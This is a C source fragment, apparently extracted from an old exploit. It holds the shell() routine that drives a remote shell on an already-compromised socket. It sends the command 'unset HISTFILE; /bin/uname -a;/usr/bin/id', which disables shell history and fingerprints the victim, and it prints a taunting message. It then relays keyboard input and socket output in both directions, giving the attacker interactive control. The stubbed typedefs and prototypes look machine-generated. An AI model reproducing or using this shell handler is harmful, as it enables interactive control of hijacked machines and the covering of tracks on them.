
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buff ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int exit (int) ;
 int fprintf (int ,char*) ;
 int read (int ,char*,int) ;
 int recv (int,char*,int,int ) ;
 scalar_t__ select (int,int *,int *,int *,int *) ;
 scalar_t__ send (int,char*,int,int ) ;
 int stderr ;
 int strlen (char*) ;
 scalar_t__ write (int,char*,int) ;

void
shell(int sock)
{
       fd_set fd_read;
       char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'\n";
       int n;

       FD_ZERO(&fd_read);
       FD_SET(sock, &fd_read);
       FD_SET(0, &fd_read);

       send(sock, cmd, strlen(cmd), 0);

       while(1) {
               FD_SET(sock, &fd_read);
               FD_SET(0, &fd_read);

               if (select(sock+1, &fd_read, ((void*)0), ((void*)0), ((void*)0)) < 0) break;

               if (FD_ISSET(sock, &fd_read)) {
                       if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                               fprintf(stderr, "[+] EOF\n");
                               exit(2);
                       }

                       if (write(1, buff, n) <0) break;
               }

               if (FD_ISSET(0, &fd_read)) {
                       if ((n = read(0, buff, sizeof(buff))) < 0){
                               fprintf(stderr,"[+] EOF\n");
                               exit(2);
                       }

                       if (send(sock, buff, n, 0) < 0) break;
               }
       }

       fprintf(stderr,"[+] Connection lost.\n\n");
       exit(0);
}
